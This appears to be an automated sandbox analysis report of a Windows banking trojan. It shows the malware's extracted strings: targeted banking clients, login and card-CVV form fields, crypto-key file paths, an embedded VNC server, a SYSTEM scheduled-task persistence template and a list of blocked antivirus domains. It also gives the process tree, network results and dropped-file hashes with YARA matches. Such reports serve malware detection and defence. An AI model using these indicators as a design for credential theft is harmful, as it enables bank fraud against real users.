\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_username=
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
CryptoPluginId=AGAVA&Sign
login=
password=
&ctl00%24MainMenu%24Login1%24UserName=
&ctl00%24MainMenu%24Login1%24Password=
advapi32.dll
CryptEncrypt
WSASend
WSARecv
name=%s&port=%u
/home.php
A B V G D E E J Z I Y K L M N O P R S T U F H C CHSHSH Y E YUYAA B V H G D E JE J Z Y I YI J K L M N O P R S T U F X C CH SH SH YU YA
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\%02d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
\private\
private.txt
\public\
public.txt
\*.key
\self.cer
\@rand
\ABONENTS*
crypto
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
found.
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
\crypto\
\micros~\crypto\
\maxthon3\public\
\microsoft\crypto\
\crypto pro\
\progra~1\crypto~1\
\temporary internet files\
:\users\public
\ryptopro
\cryptokit\
:\progra~1\common~1\crypto~1
bsi.dll
&cvv=&
&cvv2=
&cvv2=&
&cvc=&
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
FAKTURA
sks2xyz.dll
vb_pfx_import
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
BEGIN SIGNATURE
END SIGNATURE
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
DefaultPrivateDir
General
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
&txtSubId=
&txtPin=
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone=
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
RCN_R50Buffer
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
\SIGN1\
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
RSTYLE
Agava_Client.exe
UseToken
Containers
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
login.yota.ru
IDToken1=
IDToken2=
YotaConfirmForm%5Bpassword%5D
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
IsWow64Process
*SYSTEM*
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
kernel
waveOutOpen
winmm.dll
1234567890QWERTYUIOPASDFGHJKLZXCVBNM
ct_init: length != 256
ct_init: dist != 256
ct_init: 256+dist != 512
inconsistent bit counts
not enough codes
too many codes
bad compressed size
ct_tally: bad match
bad d_code
invalid length
output buffer too small for in-memory compression
bad pack level
insufficient lookahead
no future
wild scan
more < 2
RFB 003.006
LibVNCServer 0.9.7
unknown
%s (%s)
My Documents
Network Favorites
%02d/%02d/%04d %02d:%02d
No authentication mode is registered!
Your viewer cannot handle required authentication methods
password check failed!
SCardConnectA
SCardEstablishContext
SCardFreeMemory
SCardDisconnect
SCardListReadersA
SCardReleaseContext
WinSCard.dll
IsNetworkAlive
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MiniDumpWriteDump
dbghelp.dll
strstr
calloc
malloc
_snprintf
_strrev
strtol
isdigit
sprintf
strncpy
fwrite
realloc
fclose
isprint
strchr
MSVCRT.dll
GetModuleFileNameExA
PSAPI.DLL
NetApiBufferFree
NetQueryDisplayInformation
NETAPI32.dll
DnsFlushResolverCache
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetSetStatusCallback
InternetQueryOptionA
InternetConnectA
InternetReadFile
HttpOpenRequestA
InternetCheckConnectionA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
WS2_32.dll
SHGetFolderPathA
ShellExecuteA
ExtractIconExA
SHFileOperationA
SHGetSpecialFolderPathA
SHELL32.dll
StrStrIA
PathFileExistsA
PathFindFileNameA
PathAddBackslashA
StrStrIW
StrToIntA
PathMakeSystemFolderA
PathAppendA
StrCmpNIA
StrNCatA
StrStrA
StrChrIA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
ntdll.dll
GetVolumeInformationA
GetSystemWindowsDirectoryA
GetModuleFileNameA
GetLastError
SetLastError
GetProcAddress
GetModuleHandleA
IsDebuggerPresent
GetTickCount
GetEnvironmentVariableA
GetCurrentProcess
AddVectoredExceptionHandler
GetCurrentThreadId
GetCurrentProcessId
GetSystemDefaultLangID
Process32First
GetTimeFormatA
GetDateFormatA
OpenProcess
GetTimeZoneInformation
Process32Next
CreateToolhelp32Snapshot
WaitForSingleObject
LoadLibraryExA
ReleaseMutex
lstrcpynA
GetTempFileNameA
WaitForMultipleObjects
GetTempPathA
GetSystemTime
CreateFileA
SetFilePointer
MoveFileExA
SetEndOfFile
SetFilePointerEx
UnlockFile
LockFile
WriteFile
IsBadWritePtr
ReadFile
CreateDirectoryA
GetFileSizeEx
FindFirstFileA
RemoveDirectoryA
SetFileAttributesA
FindClose
FindNextFileA
DeleteFileA
HeapReAlloc
HeapAlloc
HeapFree
ExitProcess
SetErrorMode
SetEvent
OpenMutexA
lstrcpyA
MapViewOfFile
UnmapViewOfFile
IsBadReadPtr
CreateFileMappingA
GlobalLock
GlobalAlloc
CreateProcessA
MultiByteToWideChar
GlobalUnlock
GlobalFree
CreateThread
HeapCreate
lstrcmpiA
OpenEventA
lstrcmpiW
OpenFileMappingA
CreateMutexA
GetComputerNameA
lstrlenA
CreateEventA
GetVersionExA
ResetEvent
GetCommandLineA
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
GetCurrentThread
GetDriveTypeA
SetThreadPriority
SetCurrentDirectoryA
GetLogicalDriveStringsA
CopyFileA
GetCurrentDirectoryA
GetProcessHeap
HeapValidate
HeapSize
GetCommandLineW
ExitThread
MoveFileA
WinExec
TerminateThread
FindNextChangeNotification
FindFirstChangeNotificationA
lstrcmpA
CloseHandle
FlushInstructionCache
InterlockedExchange
VirtualAlloc
GetThreadPriority
VirtualProtect
WideCharToMultiByte
GetVersionExW
GetFileAttributesA
GetFileAttributesW
GetShortPathNameA
GetPrivateProfileStringA
VirtualQuery
VirtualFree
CreateRemoteThread
GetProcessTimes
Module32First
GetHandleInformation
VirtualAllocEx
LoadLibraryA
Module32Next
LocalFree
WriteProcessMemory
SwitchToThread
FileTimeToDosDateTime
GetFileSize
SystemTimeToFileTime
GetLocalTime
LocalAlloc
GetFileType
GetFileInformationByHandle
FindFirstFileW
FileTimeToSystemTime
CreateFileW
lstrlenW
FindNextFileW
KERNEL32.dll
CharUpperA
FindWindowA
GetSystemMetrics
SetCaretBlinkTime
SetThreadDesktop
GetThreadDesktop
ReleaseDC
GetShellWindow
GetWindow
DestroyIcon
SetClipboardData
OpenClipboard
GetDesktopWindow
EmptyClipboard
GetIconInfo
RegisterWindowMessageA
SendMessageA
WindowFromPoint
DrawIcon
CreateDesktopA
GetTopWindow
CloseClipboard
SendMessageW
IsWindowVisible
IsWindow
GetLastActivePopup
PostMessageW
IsIconic
MapVirtualKeyW
IsRectEmpty
GetClassLongA
GetWindowThreadProcessId
MapWindowPoints
PostMessageA
GetMenuItemInfoA
SetWindowPos
SendMessageTimeoutA
GetWindowLongA
GetAncestor
GetWindowInfo
GetParent
GetWindowRect
GetSystemMenu
DefWindowProcW
EndMenu
HiliteMenuItem
DefMDIChildProcA
GetCursor
GetMenuItemCount
DefMDIChildProcW
DestroyCursor
DefWindowProcA
GetMenuState
CopyIcon
TrackPopupMenuEx
GetMenuItemRect
GetMenu
MenuItemFromPoint
GetSubMenu
SetKeyboardState
GetMenuItemID
OpenDesktopA
GetUserObjectInformationA
PrintWindow
WindowFromDC
SetLayeredWindowAttributes
EnumChildWindows
RedrawWindow
GetWindowRgn
SetClassLongA
SetWindowLongA
GetScrollBarInfo
MoveWindow
DialogBoxIndirectParamA
SetWindowTextA
ShowWindow
EndDialog
GetDlgItem
CreateWindowExA
GetWindowTextLengthA
GetClientRect
LoadIconA
AttachThreadInput
DestroyWindow
wsprintfA
PtInRect
GetFocus
RealChildWindowFromPoint
GetClassNameA
GetCursorPos
GetWindowTextW
GetOpenClipboardWindow
GetActiveWindow
GetWindowTextA
GetGUIThreadInfo
GetKeyboardState
ToAscii
FindWindowW
DispatchMessageW
PeekMessageW
TranslateMessage
MsgWaitForMultipleObjects
GetWindowDC
USER32.dll
GetDeviceCaps
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteObject
GdiFlush
GetDIBits
CreateDIBSection
DeleteDC
CreateRectRgn
OffsetRgn
SelectClipRgn
SetViewportOrgEx
GetViewportOrgEx
BitBlt
GetClipRgn
GetObjectA
CreateFontIndirectA
GDI32.dll
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
RegCloseKey
RegSetValueExA
RegFlushKey
RegDeleteValueA
RegEnumKeyExA
RegNotifyChangeKeyValue
OpenProcessToken
GetTokenInformation
RegDeleteKeyA
ADVAPI32.dll
memcpy
memset
_except_handler3
$Id: dbfopen.c,v 1.48 2003/03/10 14:51:27 warmerda Exp $
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone3
iWindows Explorer
cmd.exe
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Actions Context="LocalSystem">
<Exec>
<Command>%s</Command>
</Exec>
</Actions>
</Task>
<!--00-->
\\?\globalroot\systemroot\system32\tasks\
task%d
<Actions
mavast.com
kaspersky
eset.com
antivir
virustotal
virusinfo
z-oleg.com
kltest.org.ru
trendsecure
anti-malware
.comodo.com
google.com
#+3;CScs
tdefault
--no-sandbox
serverkey.dat
private
public
\java\
\windows\
SunAwtFrame
SunAwtDialog
MS Sans Serif

Process Tree

04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe, PID: 2064, Parent PID: 628
    svchost.exe, PID: 2228, Parent PID: 2064
360DrvMgr.exe, PID: 1684, Parent PID: 1412
    ComputerZService.exe, PID: 348, Parent PID: 1684
    ComputerZService.exe, PID: 2968, Parent PID: 1684
        dll_service.exe, PID: 1472, Parent PID: 2968
        dll_service.exe, PID: 1496, Parent PID: 2968
        dll_service.exe, PID: 2520, Parent PID: 2968
        dll_service.exe, PID: 3036, Parent PID: 2968
        dll_service.exe, PID: 696, Parent PID: 2968
360TptMon.exe, PID: 1736, Parent PID: 1704

DNS

Name Response Post-Analysis Lookup

TCP

Source Source Port Destination Destination Port

UDP

Source Source Port Destination Destination Port

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

Source Destination ICMP Type Data
192.168.56.101 114.114.114.114 3
192.168.56.101 8.8.8.8 3
192.168.56.101 114.114.114.114 3

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Name 5c67fb44713b6d65_computerz.set
Filepath C:\Program Files (x86)\360\360DrvMgr\ComputerZ.set
Size 488.0B
Processes 2968 (ComputerZService.exe)
Type Generic INItialization configuration [HardWareIDs]
MD5 ae8f3b8d468650ed81aa77e79818b6ea
SHA1 39e48f4b161743246e2f8735c1f834386732a7c1
SHA256 5c67fb44713b6d65c0f911048687dad1dea3c2b6f5a65533e7b87d54a0ec53c8
CRC32 EDB39C68
ssdeep None
Yara None matched
Name 0ab7f08e0a5f1423_svchost.exe
Filepath C:\Windows\AppPatch\svchost.exe
Size 711.0KB
Processes 2064 (04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe)
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 555f392ca53ab5f782aff94f12d01088
SHA1 50830d26c1deb39432570f4b16a0f5526931ea01
SHA256 0ab7f08e0a5f14232b8a51171d4f587fb4228ee75c216110939f14933d7b4fef
CRC32 44FA3D03
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
Name e3b0c44298fc1c14_F01D.tmp
Size 0.0B
Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
ssdeep None
Yara None matched
Name 999a2d6833cfbbb1_ComputerZ_HardwareDll.log
Filepath C:\Program Files (x86)\360\360DrvMgr\Log\ComputerZ_HardwareDll.log
Size 127.9KB
Type Unicode text, UTF-8 text, with very long lines (596), with CRLF, LF line terminators
MD5 89827550801d5a6a7ec9e2c36499bf3f
SHA1 0d6bf89da29804c73ff58746d3796f44f4e90f92
SHA256 999a2d6833cfbbb186690c53c99544c330f9283cb1eae999e3e17ced7a957ecd
CRC32 323D85A1
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
  • embedded_win_api - A non-Windows executable contains win32 API functions names
Name 04fd4db1c34dba0f_E8D9.tmp
Filepath C:\Users\Administrator\AppData\Local\Temp\E8D9.tmp
Size 711.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 53efb5b3154447e416573f00bf71a423
SHA1 880612b1e2ff5e478a682eaecb7411509a5141d0
SHA256 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4
CRC32 63B98BC3
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
Name 1e2ca08c86040e48_computerz_hardwaredll.log
Filepath C:\Program Files (x86)\360\360DrvMgr\Log\ComputerZ_HardwareDll.log
Size 65.8KB
Processes 2968 (ComputerZService.exe) 1472 (dll_service.exe) 1496 (dll_service.exe) 2520 (dll_service.exe) 3036 (dll_service.exe) 696 (dll_service.exe)
Type Unicode text, UTF-8 text, with very long lines (596), with CRLF, LF line terminators
MD5 50a0f589041589f1547df6fd3373b174
SHA1 1427ef8040de5a2feac5d62a11e70313906840c7
SHA256 1e2ca08c86040e4897f33ccbdacd4a60f8a65623c9a84c510707a8d3763e76dc
CRC32 BBA56562
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
Name 501b45da2f14fb66a5098cfaa2e35fcd0070956c
Size 327.0KB
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 279b5a7863f670d3f1566f68806d7a45
SHA1 501b45da2f14fb66a5098cfaa2e35fcd0070956c
SHA256 ab19b5e4a5ab2d1140268e112aaea46926692dd38fbb23a11c2dce5e425f821d
CRC32 7CD47E0B
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
Name e09fcbbc4e17841b7d18562c6ac7f74b0c1fb970
Size 330.5KB
Type data
MD5 e10828b1d99633018a930838db62f36a
SHA1 e09fcbbc4e17841b7d18562c6ac7f74b0c1fb970
SHA256 d5a0283bd09f120f4865c7bfcee70850de7e02cbc094d84868ef75861a6519c0
CRC32 CF3678D8
ssdeep None
Yara
  • shellcode - Matched shellcode byte patterns
  • vmdetect - Possibly employs anti-virtualization techniques
  • embedded_pe - Contains an embedded PE32 file
  • embedded_win_api - A non-Windows executable contains win32 API functions names